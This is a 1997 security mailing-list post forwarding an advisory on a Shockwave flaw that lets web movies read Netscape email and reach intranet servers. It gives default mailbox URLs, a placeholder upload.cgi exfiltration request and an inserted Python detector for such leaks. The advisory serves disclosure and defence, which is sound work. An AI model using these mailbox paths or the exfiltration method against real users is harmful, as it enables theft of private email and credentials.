[73] in Best-of-Security
BoS: Shockwave Security Alert
daemon@ATHENA.MIT.EDU (Aleph One)
Fri Mar 14 08:27:07 1997
Date: Fri, 14 Mar 1997 01:01:17 -0600
Reply-To: Aleph One <aleph1@DFW.NET>
From: Aleph One <aleph1@DFW.NET>
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net
http://www.webcomics.com/shockwave/
SHOCKWAVE SECURITY ALERT
AKA :: How to use Shockwave to read people's Netscape email!
10-Mar-97 --- reported by: David de Vitry
What is this about?
This is about a security hole in Shockwave that allows malicious
webpage developers to create a Shockwave movie that will read
through a user's emails, and potentially upload them to a server,
all without the user knowing about it. In addition, there is a
risk to internal Web servers behind corporate firewalls,
regardless of the browser you use (Netscape or Internet Explorer),
as long as you have the current release of Shockwave.
Who could be affected?
Users of Netscape 3.0 (and 2.0?) on Win 95 / NT / Mac with
Shockwave installed. In addition, the user must not have upgraded
to "Communicator" (this just changes the directory structure) and
must use the Netscape browser to read their email. There may be
other browsers / platforms affected by similar insecurities with
Shockwave.
How is this done?
A developer can use Shockwave to access the user's Netscape email
folders. This is done by assuming the name and path of the mailbox
on the user's hard drive. For example, names such as Inbox, Outbox,
Sent and Trash are all default names for mail folders. The default
path to the "Inbox" on Win 95/NT would be: "C:/Program
Files/Netscape/Navigator/Mail/Inbox". Then the developer can use
the Shockwave command "GETNETTEXT" to call Navigator to query the
email folder for an email message. The result of this call can
then be fed into a variable, and later processed and sent to a
server. To access a message, for example the first message in a
user's Inbox, the following location would be used:
For Windows: mailbox:C:/Program Files/Netscape/Navigator/Mail/Inbox?number=0
For MacOS (thanks Jeremy Traub):
mailbox:/Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C4/Mail/Inbox?number=0
Note: if these links all give you an error (such as folder no
longer exists), then you might not have anything to worry about.
However, if you see an email message in a pop up window, and you
have Shockwave installed, then you are vulnerable to this security
hole.
Show Me an example! Here it is, a Shockwave movie that will read your
email. This will not work for everyone; it is currently only set up to
work with Win95 / NT, but it could be extended to identify the browser
(Jeremy Traub).
Interesting, but what is the security hole?
It doesn't stop at just the first message of your inbox.
A Shockwave program could increment through a user's entire inbox,
outbox, sent, and trash email folders. This information could then
be sent back to a server (using the GET method with a simple CGI
program, e.g.
http://www...com/upload.cgi?data=This_could_be_your_email_content_
here), all without the user ever noticing. Here are just a few
types of information that a malicious developer could obtain using
this hole:
+ Your name and email
+ Your friends' names and emails
+ User IDs and passwords sent to you in email, and where and
how to use them.
+ Personal email messages that you sent or received using
Netscape
The "GETNETTEXT" command also has other problems in that it can
access other HTTP servers, including ones that are not on the
Internet, i.e. ones that are behind a corporate firewall, if the
movie is run from behind the firewall. This may be an even
bigger problem than the email one; however, it affects only
corporate users.
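The exfiltration path above (mail text stuffed into the query string of a GET to a CGI script) leaves a trace in proxy logs. As an added illustration that is not part of the original alert, here is a small log check that flags requests whose decoded query values carry mail header lines; the log line format, hostnames and the upload.cgi?data= parameter name are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample proxy log lines ("client_ip method url status"). Hosts and
# the upload.cgi?data= parameter are assumptions modelled on the alert's URL shape.
SAMPLE_LOG = """\
10.0.0.7 GET http://www.example-shock.test/upload.cgi?data=From%3A+alice%40example.test%0ASubject%3A+your+password%0A%0Apw+is+hunter2 200
10.0.0.7 GET http://www.example.test/index.html 200
10.0.0.9 GET http://www.example.test/search.cgi?q=shockwave+movies 200
10.0.0.9 GET http://www.example-shock.test/upload.cgi?data=Received%3A+from+mail.example.test%0AFrom%3A+bob%40example.test 200
"""

# Mail header lines that have no business inside a GET query string.
MAIL_HEADER_RE = re.compile(
    r"^(From|To|Subject|Received|Date|Message-ID):", re.MULTILINE | re.IGNORECASE
)

def suspicious_params(url, max_len=512):
    """Return (param_name, reason) for query values that look like exfiltrated mail."""
    # parse_qs percent-decodes values, so an encoded newline (%0A) becomes a real
    # line break and the MULTILINE regex can match each decoded header line.
    hits = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            if MAIL_HEADER_RE.search(value):
                hits.append((name, "mail headers in query value"))
            elif len(value) > max_len:
                # Weaker signal: GET-based uploads must stuff everything into the query.
                hits.append((name, "oversized query value"))
    return hits

def scan_log(text):
    """Return (client_ip, host, param, reason) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, _method, url, _status = line.split()
        for name, reason in suspicious_params(url):
            findings.append((client, urlsplit(url).netloc, name, reason))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(*finding)
```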
Help: What can I do to protect myself?
There are a number of things that you could do to protect yourself
from malicious Shockwave movies:
+ Change the path to your mail folders
+ Don't use Netscape to read or send email
+ Uninstall Shockwave
+ Don't go to potentially hostile sites.
What are people saying? -- please inform me of any other articles.
* Wired article
* Macromedia and Netscape have given me no official statements.
However, they are both in communication with me regarding this
issue. Macromedia did say that their newest product "Shockwave 6,"
currently in pre-release, does fix this problem.
* Microsoft did not want to talk with me about the issue, even
though there are risks to their users. They just blew me off
saying "There are obviously plenty of security bugs to go around."
Followed by, "Great, we're checking it out now."
The hosting for this page was made possible by WebComics,
Interverse and the author David de Vitry